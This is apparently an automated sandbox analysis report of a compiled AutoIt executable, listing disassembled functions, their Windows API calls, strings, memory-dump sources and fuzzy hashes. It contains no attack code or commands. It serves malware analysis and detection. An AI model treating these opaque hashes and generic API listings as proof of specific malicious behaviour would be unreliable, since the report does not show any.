Instruction Fuzzy Hash: 57518DB15183059FDB00EF25CC8196AB3E8FF88718F14886DF88A97261DB75ED09DB42

Function 00FEF8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00FCE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00FEF8DF
LoadStringW.USER32(00000000,?,00FCE029,00000001), ref: 00FEF8E8

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

GetModuleHandleW.KERNEL32(00000000,01055310,?,00000FFF,?,?,00FCE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00FEF90A
LoadStringW.USER32(00000000,?,00FCE029,00000001), ref: 00FEF90D
__swprintf.LIBCMT ref: 00FEF95D
__swprintf.LIBCMT ref: 00FEF96E
_wprintf.LIBCMT ref: 00FEFA17
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00FEFA2E

Strings

Line %d (File "%s"):, xrefs: 00FEF957
Error: , xrefs: 00FEF9E5
^ ERROR, xrefs: 00FEF9C3
Line %d:, xrefs: 00FEF968
%s (%d) : ==> %s: %s %s, xrefs: 00FEFA12

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 984253442-2268648507
Opcode ID: 5c003b86c407189719b0ad3f703cc20850421d21108b3a959f89f640605ef5cb
Instruction ID: 4af22e6ec98618dcf0b881c7540b10a93bc25b0b5f8b16f8ea4a8fbe2d8f43a9
Opcode Fuzzy Hash: 5c003b86c407189719b0ad3f703cc20850421d21108b3a959f89f640605ef5cb
Instruction Fuzzy Hash: 3A416A72800309ABDF15FBE1DD86EEEB778AF18700F500465F505B6092EA396F09EB61

Function 0101BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,01019207,?,?), ref: 0101BA56
GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA6D
GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA78
CloseHandle.KERNEL32(00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA85
GlobalLock.KERNEL32(00000000), ref: 0101BA8E
ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BA9D
GlobalUnlock.KERNEL32(00000000), ref: 0101BAA6
CloseHandle.KERNEL32(00000000,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BAAD
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,01019207,?,?,00000000,?), ref: 0101BABE
OleLoadPicture.OLEAUT32(?,00000000,00000000,01022CAC,?), ref: 0101BAD7
GlobalFree.KERNEL32(00000000), ref: 0101BAE7
GetObjectW.GDI32(00000000,00000018,?), ref: 0101BB0B
CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 0101BB36
DeleteObject.GDI32(00000000), ref: 0101BB5E
SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0101BB74

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
String ID:
API String ID: 3840717409-0
Opcode ID: 9e2398bea5a4f862a95a53bddb5f081e6f77ad8f3b9a3ca39a0c5edd5dc49401
Instruction ID: 99d12d59721000ea69df6c85de21bbc530479d7250c40ad8a9325ce0d5e25fcb
Opcode Fuzzy Hash: 9e2398bea5a4f862a95a53bddb5f081e6f77ad8f3b9a3ca39a0c5edd5dc49401
Instruction Fuzzy Hash: AB416B75600209EFDB21DFA9DC88EAA7BF8FF89711F104058F989D7254C7799905CB20

Function 00FFD899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON

Download Yara Rule

APIs

__wsplitpath.LIBCMT ref: 00FFDA10
_wcscat.LIBCMT ref: 00FFDA28
_wcscat.LIBCMT ref: 00FFDA3A
GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00FFDA4F
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFDA63
GetFileAttributesW.KERNEL32(?), ref: 00FFDA7B
SetFileAttributesW.KERNEL32(?,00000000), ref: 00FFDA95
SetCurrentDirectoryW.KERNEL32(?), ref: 00FFDAA7

Strings

*.*, xrefs: 00FFDAE6

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
String ID: *.*
API String ID: 34673085-438819550
Opcode ID: 448f6272ad08acdc9c4c2949be370514391083ebfa429bc39d77e758db4ba384
Instruction ID: 10bc44d46c9649c85d3a4100ad118423b996490ba267a4c79cd44173eda4d165
Opcode Fuzzy Hash: 448f6272ad08acdc9c4c2949be370514391083ebfa429bc39d77e758db4ba384
Instruction Fuzzy Hash: 5181C4729043099FCB34DFA4C844ABAB7E9BF89354F14482EF589C7221E774D944EB52

Function 0101C1AC Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 229windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0101C1FC
GetFocus.USER32 ref: 0101C20C
GetDlgCtrlID.USER32(00000000), ref: 0101C217
_memset.LIBCMT ref: 0101C342
GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0101C36D
GetMenuItemCount.USER32(?), ref: 0101C38D
GetMenuItemID.USER32(?,00000000), ref: 0101C3A0
GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0101C3D4
GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0101C41C
CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0101C454
DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0101C489

Strings

0, xrefs: 0101C33A

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
String ID: 0
API String ID: 1296962147-4108050209
Opcode ID: 7197b59ab2617c2033bcfffe8ff669d6004a32ac7761198134e6e722e97f1418
Instruction ID: 411cafafd5e1b09d6dd3d81f0726d347441a6d86a9842da30c557c5731161642
Opcode Fuzzy Hash: 7197b59ab2617c2033bcfffe8ff669d6004a32ac7761198134e6e722e97f1418
Instruction Fuzzy Hash: 4E81AF702883119FE761CF28C984AABBBE8FB88714F00495DFAD597295DB39D904CB52

Function 0100731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0100738F
CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 0100739B
CreateCompatibleDC.GDI32(?), ref: 010073A7
SelectObject.GDI32(00000000,?), ref: 010073B4
StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 01007408
GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 01007444
GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 01007468
SelectObject.GDI32(00000006,?), ref: 01007470
DeleteObject.GDI32(?), ref: 01007479
DeleteDC.GDI32(00000006), ref: 01007480
ReleaseDC.USER32(00000000,?), ref: 0100748B

Strings

(, xrefs: 01007410

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
String ID: (
API String ID: 2598888154-3887548279
Opcode ID: 92e35cb9136e37f60245e85451e2c9a5d6c58f8c1d6f971de807a52a9649823e
Instruction ID: 9f4c38844264c3d0713c5517dda53c1449d9654ba448ab437a3c609e0c0a301f
Opcode Fuzzy Hash: 92e35cb9136e37f60245e85451e2c9a5d6c58f8c1d6f971de807a52a9649823e
Instruction Fuzzy Hash: 45515B75900309EFEB25CFA8D885EAEBBB9EF48310F14841DF99997250C739A944CB50

Function 00F96A8C Relevance: 19.7, APIs: 4, Strings: 7, Instructions: 478COMMON

Download Yara Rule

APIs

Part of subcall function 00FB0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00F96B0C,?,00008000), ref: 00FB0973

Part of subcall function 00F94750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F94743,?,?,00F937AE,?), ref: 00F94770

SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00F96BAD
SetCurrentDirectoryW.KERNEL32(?), ref: 00F96CFA

Part of subcall function 00F9586D: _wcscpy.LIBCMT ref: 00F958A5

Part of subcall function 00FB363D: _iswctype.LIBCMT ref: 00FB3645

Strings

Bad directive syntax error, xrefs: 00FCE79D
EA06, xrefs: 00FCE452
Unterminated string, xrefs: 00FCE7E4
Error opening the file, xrefs: 00FCE43D, 00FCE4B8
>>>AUTOIT SCRIPT<<<, xrefs: 00FCE496
AU3!, xrefs: 00F96B61
#include depth exceeded. Make sure there are no recursive includes, xrefs: 00FCE421

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
API String ID: 537147316-1018226102
Opcode ID: 076b58f7d51961d1d4bd9340dd5ae3fb133f59bdfc389cfeb173190950499255
Instruction ID: f6a705282f775f42f262aba9a5028a6c358bbe74aff702e9880ab5675ee43a38
Opcode Fuzzy Hash: 076b58f7d51961d1d4bd9340dd5ae3fb133f59bdfc389cfeb173190950499255
Instruction Fuzzy Hash: 5D02BB315083419FDB25EF20C881EAFBBE5AF98314F14491EF499972A1DB38D949EB42

Function 00FF2D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2D50
GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00FF2DDD
GetMenuItemCount.USER32(01055890), ref: 00FF2E66
DeleteMenu.USER32(01055890,00000005,00000000,000000F5,?,?), ref: 00FF2EF6
DeleteMenu.USER32(01055890,00000004,00000000), ref: 00FF2EFE
DeleteMenu.USER32(01055890,00000006,00000000), ref: 00FF2F06
DeleteMenu.USER32(01055890,00000003,00000000), ref: 00FF2F0E
GetMenuItemCount.USER32(01055890), ref: 00FF2F16
SetMenuItemInfoW.USER32(01055890,00000004,00000000,00000030), ref: 00FF2F4C
GetCursorPos.USER32(?), ref: 00FF2F56
SetForegroundWindow.USER32(00000000), ref: 00FF2F5F
TrackPopupMenuEx.USER32(01055890,00000000,?,00000000,00000000,00000000), ref: 00FF2F72
PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00FF2F7E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
String ID:
API String ID: 3993528054-0
Opcode ID: 6fed25eee4d72b9fddf1797f5a3109b75d356dacc5935ea9f5eb41baf7bc1386
Instruction ID: b6c0f8ae3632c559f7944cf05dd8be1be9885dad902dfedc091a7dceba585865
Opcode Fuzzy Hash: 6fed25eee4d72b9fddf1797f5a3109b75d356dacc5935ea9f5eb41baf7bc1386
Instruction Fuzzy Hash: 6371C271A0020ABAEB619F54DC85FBABF64FF04764F200216F715AA1F1C7B55820EB94

Function 00FE77DC Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 128registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

_memset.LIBCMT ref: 00FE786B
WNetAddConnection2W.MPR(?,?,?,00000000), ref: 00FE78A0
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 00FE78BC
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 00FE78D8
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00FE7902
CLSIDFromString.OLE32(?,?,?,SOFTWARE\Classes\), ref: 00FE792A
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE7935
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00FE793A

Strings

\IPC$, xrefs: 00FE7882
SOFTWARE\Classes\, xrefs: 00FE780C
\CLSID, xrefs: 00FE7822

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 1411258926-22481851
Opcode ID: d8a273737c9c62f4ca46f897c62f5bc61af251ff36e8c9589dcd38064415b51f
Instruction ID: 3ffa99455d977f0421089f98c7a1d2184f84a05871d08048303f91642efac43e
Opcode Fuzzy Hash: d8a273737c9c62f4ca46f897c62f5bc61af251ff36e8c9589dcd38064415b51f
Instruction Fuzzy Hash: 2E411572C14229ABDF21EFA5DC85DEEB7B8BF14710F404029F805A7161EB399E08DB90

Function 01010E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

Strings

HKEY_LOCAL_MACHINE, xrefs: 01010E9A
HKEY_CLASSES_ROOT, xrefs: 01010EC4
HKEY_USERS, xrefs: 01010F32
HKCR, xrefs: 01010ED9
HKEY_CURRENT_CONFIG, xrefs: 01010EEE
HKEY_CURRENT_USER, xrefs: 01010F10
HKCU, xrefs: 01010F21
HKLM, xrefs: 01010EAF
HKCC, xrefs: 01010EFF
HKU, xrefs: 01010F43

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: BuffCharUpper
String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
API String ID: 3964851224-909552448
Opcode ID: db2648d18f2f878924010c0362b8565e73e677d2f9f3ab7b9dd9b371e29b007d
Instruction ID: 3a3aac79fe4544109fd0e699eb1f94e60827706f1293036b850ae8265c1e178a
Opcode Fuzzy Hash: db2648d18f2f878924010c0362b8565e73e677d2f9f3ab7b9dd9b371e29b007d
Instruction Fuzzy Hash: A741467110024A8BDF01FE14DC96AEF37A4BF45308F144869FCD51B69ADB3D9999CBA0

Function 00FEF7A1 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 75windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00FCE2A0,00000010,?,Bad directive syntax error,0101F910,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 00FEF7C2
LoadStringW.USER32(00000000,?,00FCE2A0,00000010), ref: 00FEF7C9

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

_wprintf.LIBCMT ref: 00FEF7FC
__swprintf.LIBCMT ref: 00FEF81E
MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00FEF88D

Strings

Error: , xrefs: 00FEF85B
Line %d (File "%s"):, xrefs: 00FEF833
., xrefs: 00FEF873
%s (%d) : ==> %s.: %s %s, xrefs: 00FEF7F7
Line %d:, xrefs: 00FEF818

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 1506413516-4153970271
Opcode ID: a43ce12d8265246e633359c360529dd722b25839dc9e888f1629906646d6a552
Instruction ID: 6e7e5345ed3ea11f203f3471e99b86e30207bc34c3bb22f0979623dfd68a020c
Opcode Fuzzy Hash: a43ce12d8265246e633359c360529dd722b25839dc9e888f1629906646d6a552
Instruction Fuzzy Hash: D421717295031AABDF12FFA1CC4AEED7779BF18300F04486AF50566061EA39A618EB50

Function 00FF52C7 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 74COMMON

Download Yara Rule

APIs

Part of subcall function 00F97BCC: _memmove.LIBCMT ref: 00F97C06

Part of subcall function 00F97924: _memmove.LIBCMT ref: 00F979AD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 00FF5330
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 00FF5346
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00FF5357
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 00FF5369
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 00FF537A

Strings

play PlayMe, xrefs: 00FF5375
close PlayMe, xrefs: 00FF5341, 00FF536E
alias PlayMe, xrefs: 00FF5309
status PlayMe mode, xrefs: 00FF532B
play PlayMe wait, xrefs: 00FF5364
open , xrefs: 00FF52DF

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: SendString$_memmove
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2279737902-1007645807
Opcode ID: 19e8b00d2a895190e97740cf81cc16469bfce274870592f473886113582cf94e
Instruction ID: 80ffc8c3c87fe2591d5d204e741cc67bb2503ac1e5fd6a1c226688ccacba3a48
Opcode Fuzzy Hash: 19e8b00d2a895190e97740cf81cc16469bfce274870592f473886113582cf94e
Instruction Fuzzy Hash: 4711E670E5031D7AEB60F6A6DC89DFF7B7CFF95F50F00082A7501A60A1E9A04C04D560

Function 00FF46B7 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 73networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 00FF46D2
gethostname.WSOCK32(?,00000100), ref: 00FF46EC
gethostbyname.WSOCK32(?), ref: 00FF46F9
_wcscpy.LIBCMT ref: 00FF4721
_memmove.LIBCMT ref: 00FF4734
inet_ntoa.WSOCK32(?), ref: 00FF473F
_strcat.LIBCMT ref: 00FF474D
_wcscpy.LIBCMT ref: 00FF4764
WSACleanup.WSOCK32 ref: 00FF4772
_wcscpy.LIBCMT ref: 00FF4780

Strings

0.0.0.0, xrefs: 00FF471B

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 208665112-3771769585
Opcode ID: f20821567562add1c0d440a272f15b0eb4fcc32c941017918d8ebf203af81b7c
Instruction ID: 1fd8f5fa7c201dc0366508e618c3873c67248c1aacabca7ac3ed316cf8fe4019
Opcode Fuzzy Hash: f20821567562add1c0d440a272f15b0eb4fcc32c941017918d8ebf203af81b7c
Instruction Fuzzy Hash: DB112B329041196FCB20BB319C4AEEF77BCEF05721F0401A6F985D6061EF79D985AB50

Function 00FF4F75 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 00FF4F7A

Part of subcall function 00FB049F: timeGetTime.WINMM(?,76C1B400,00FA0E7B), ref: 00FB04A3

Sleep.KERNEL32(0000000A), ref: 00FF4FA6
EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00FF4FCA
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00FF4FEC
SetActiveWindow.USER32 ref: 00FF500B
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00FF5019
SendMessageW.USER32(00000010,00000000,00000000), ref: 00FF5038
Sleep.KERNEL32(000000FA), ref: 00FF5043
IsWindow.USER32 ref: 00FF504F
EndDialog.USER32(00000000), ref: 00FF5060

Strings

BUTTON, xrefs: 00FF4FDE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: be1c97697109baa17d630038d56131eef59cd7516c731acb2c008cae32da54ed
Instruction ID: 91e2de4800590dc39e218a396c5fb49d1cbe3a7eef2a8b95bbd09f98b6ae5e39
Opcode Fuzzy Hash: be1c97697109baa17d630038d56131eef59cd7516c731acb2c008cae32da54ed
